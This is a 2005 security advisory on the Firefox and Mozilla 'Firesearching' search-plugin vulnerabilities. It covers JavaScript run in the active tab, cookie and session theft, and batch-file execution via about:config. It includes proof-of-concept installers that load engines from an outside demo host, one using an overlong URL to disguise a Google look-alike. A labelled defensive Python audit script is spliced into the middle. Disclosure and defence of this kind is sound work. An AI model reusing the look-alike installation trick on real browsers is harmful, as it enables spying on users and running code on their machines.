
[NEWS] Mozilla Suite and Firefox Firesearching Vulnerabilities

Subject: [NEWS] Mozilla Suite and Firefox Firesearching Vulnerabilities
Date: 19 Apr 2005 11:25:37 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  Mozilla Suite and Firefox Firesearching Vulnerabilities
------------------------------------------------------------------------


SUMMARY

The search plugin technology in Firefox is based on Apple's Sherlock 
files, a simple text format for syndicating a search engine interface. The 
installer and parser of those files contain design bugs that make it 
possible to create a search engine that works as a spyware tool and/or as 
an execution vehicle for arbitrary code.

By creating a special Sherlock file it is possible to run JavaScript code 
in the security context of the currently active tab, and to overwrite an 
existing search engine without giving the user a chance to see what is 
going on. These vulnerabilities allow attackers to steal sessions and 
cookies from users, to execute arbitrary code, and to redirect searches to 
a site of their choosing instead of the search engine the user selected.

DETAILS

Vulnerable Systems:
 * Mozilla suite version 1.0.2 and prior
 * Firefox version 1.0.2 and prior

Immune Systems:
 * Mozilla suite version 1.0.3
 * Firefox version 1.0.3

Firesearching 1:
The vulnerability allows attackers to steal information from users, 
monitor their activities and also execute arbitrary code such as spyware 
and other types of monitoring tools.

The demo adds a new search engine (called Firesearching) by calling 
sidebar.addSearchEngine() that behaves like a normal Google search. When 
searching with that engine an alert shows that the engine has JavaScript 
access to the currently active tab. An attacker could silently send the 
information to another host instead.

When the currently displayed site is privileged (chrome or about:config) 
the demo requests UniversalXPConnect rights, creates c:\booom.bat and 
launches the batch file (shows a directory listing in a dos box). This 
part is Windows only, which is a limitation of the demo - the bug affects 
all platforms.

Example:
To reproduce:

 1. Add the search engine
 2. Search for any keyword (cookie message for mikx.de)
 3. Search for any keyword again (cookie message for google.com)
 4. Open about:config
 5. Search for any keyword again (creates c:\booom.bat and launches it)

<script language="JavaScript" type="text/javascript">
    // Installs the demo engine. The third argument is the name shown in
    // the confirmation dialog; the name shown in the search dropdown
    // comes from the Sherlock (.src) file itself.
    function addSearch() {
        window.sidebar.addSearchEngine(
            "http://www.mikx.de/firesearching/firesearching.src",
            "http://www.mikx.de/firesearching/firesearching.png",
            "Firesearching",
            "Web" );
    }
</script>
<a href="javascript:addSearch()">Add Firesearching demo engine</a>

Firesearching 2:
The displayed name in the confirmation dialog is taken from the third 
parameter of sidebar.addSearchEngine(), but the displayed name in the 
search dropdown is taken from the Sherlock file. This way it is possible 
to overwrite the default Google search with a modified version that 
monitors the data and/or waits for a chance to run code. The string 
"google.src" in the source URL can also be moved out of the dialog by 
supplying a really long URL for the Sherlock file (the dialog simply cuts 
off the source URL when it gets too long).

The user will probably think the search engine installation just failed, 
because after confirming the installation dialog Firefox never displays an 
error message if the installation failed because e.g. the Sherlock file 
is broken or not found. Since there is no UI to see details about the 
installed searches, a common user will probably never find out that the 
default Google search got modified. Using the built-in Sherlock update 
feature an attacker also gets a decent update mechanism to modify the 
scripts beyond the initial infection.

Example:
To reproduce:

 1. Add the search engine
 2. Search for any keyword (cookie message for mikx.de)
 3. Search for any keyword again (cookie message for google.com)
 4. Open about:config
 5. Search for any keyword again (creates c:\booom.bat and launches it)

WARNING: Adding the Google "look-a-like" will overwrite your original 
Google search! Make sure you have a backup of your google.src. You can 
visit mozdev.org at <http://mycroft.mozdev.org/quick/google.html> to 
re-install a real Google search.

<script language="JavaScript" type="text/javascript">
    // Installs the look-alike engine. The very long source URL pushes the
    // trailing "google.src" out of the truncated confirmation dialog.
    function addGoogle() {
        window.sidebar.addSearchEngine(
            "http://www.mikx.de/firesearching/areallylongstringlthatmakesthedialogcuttheurltotheright...cuttheurltotheright/google.src",
            "http://www.mikx.de/firesearching/areallylongstringlthatmakesthedialogcuttheurltotheright...cuttheurltotheright/google.png",
            "Firesearching 'look-a-like'",
            "Web" );
    }
</script>
<a href="javascript:addGoogle()">Add Google "look-a-like" demo engine</a>
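Because the dropdown label comes from the Sherlock file rather than from the installation dialog, and because the built-in update feature lets the file's author replace it later, the practical check for a defender is to audit the .src files that actually ended up in a profile. The script below is an added example, not part of the advisory and not Mozilla's code. It assumes the classic Sherlock layout (a <search> element whose name attribute is the dropdown label and whose action attribute is the URL queried, optionally followed by a <BROWSER update="..."> element used by the update feature); the two sample files, the list of trusted hosts and the example.invalid host names are constructed for the demo.

```python
"""
Audit Sherlock search-plugin (.src) files for the two patterns in the
Firesearching advisory: a label that claims a well-known engine while the
action URL points elsewhere, and an update URL on a different host than
the engine itself. Added example; the file layout it parses is assumed.
"""
import re
from urllib.parse import urlparse

# Labels a plugin may carry only if its action URL really belongs to that
# operator. Assumption for the demo; extend with the engines you ship.
TRUSTED_HOSTS = {
    "google": ("google.com",),
}

_SEARCH_RE = re.compile(r"<search\b(?P<attrs>.*?)>", re.IGNORECASE | re.DOTALL)
_BROWSER_RE = re.compile(r"<browser\b(?P<attrs>.*?)>", re.IGNORECASE | re.DOTALL)
_ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')


def parse_sherlock(text):
    """Return the attributes of <search> and <BROWSER> as two dicts (keys lower-cased)."""
    def attrs(match):
        if not match:
            return {}
        return {k.lower(): v for k, v in _ATTR_RE.findall(match.group("attrs"))}
    return attrs(_SEARCH_RE.search(text)), attrs(_BROWSER_RE.search(text))


def _host(url):
    return (urlparse(url).hostname or "").lower()


def _under(host, domain):
    return host == domain or host.endswith("." + domain)


def audit_sherlock(text):
    """Return a list of findings for one .src file; an empty list means nothing suspicious."""
    search, browser = parse_sherlock(text)
    findings = []
    name = search.get("name", "")
    action = search.get("action", "")

    # A search engine only ever needs http(s); any other scheme (javascript:,
    # file:, ...) means the "engine" does something other than query a site.
    if urlparse(action).scheme.lower() not in ("http", "https"):
        findings.append(f"non-http action URL: {action!r}")

    # Dropdown label impersonates a well-known engine but queries another host.
    for label, domains in TRUSTED_HOSTS.items():
        if label in name.lower() and not any(_under(_host(action), d) for d in domains):
            findings.append(f"name {name!r} does not match action host {_host(action)!r}")

    # Update URL on a foreign host: whoever controls it can replace the plugin
    # later through the built-in update feature.
    update = browser.get("update", "")
    if update and _host(update) != _host(action):
        findings.append(f"update host {_host(update)!r} differs from action host {_host(action)!r}")
    return findings


# Constructed sample: a plugin whose label, action and update host agree.
GENUINE_SRC = """<search
   version="7.1"
   name="Google"
   description="Google Search"
   method="GET"
   action="http://www.google.com/search"
>
<input name="q" user>
</search>
<BROWSER
   update="http://www.google.com/google.src"
   updateCheckDays="7"
>
"""

# Constructed sample: a look-alike that keeps the "Google" label but sends
# queries to one third-party host and pulls updates from another.
LOOKALIKE_SRC = """<search
   version="7.1"
   name="Google"
   description="Google Search"
   method="GET"
   action="http://search.example.invalid/lookalike"
>
<input name="q" user>
</search>
<BROWSER
   update="http://update.example.invalid/google.src"
   updateCheckDays="1"
>
"""

if __name__ == "__main__":
    for label, src in (("genuine", GENUINE_SRC), ("look-alike", LOOKALIKE_SRC)):
        print(label, audit_sherlock(src) or "clean")
```

Run audit_sherlock over every .src file in a profile's searchplugins directory to find an engine that has already been swapped; it is a detective control only, since it cannot tell a replacement apart from a legitimate plugin that was never impersonating anyone, so treat any finding as a prompt to compare the file against a known-good copy.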


ADDITIONAL INFORMATION

The information has been provided by Michael Krax <mailto:mikx@mikx.de>.
The original article can be found at: <http://www.mikx.de/firesearching/>


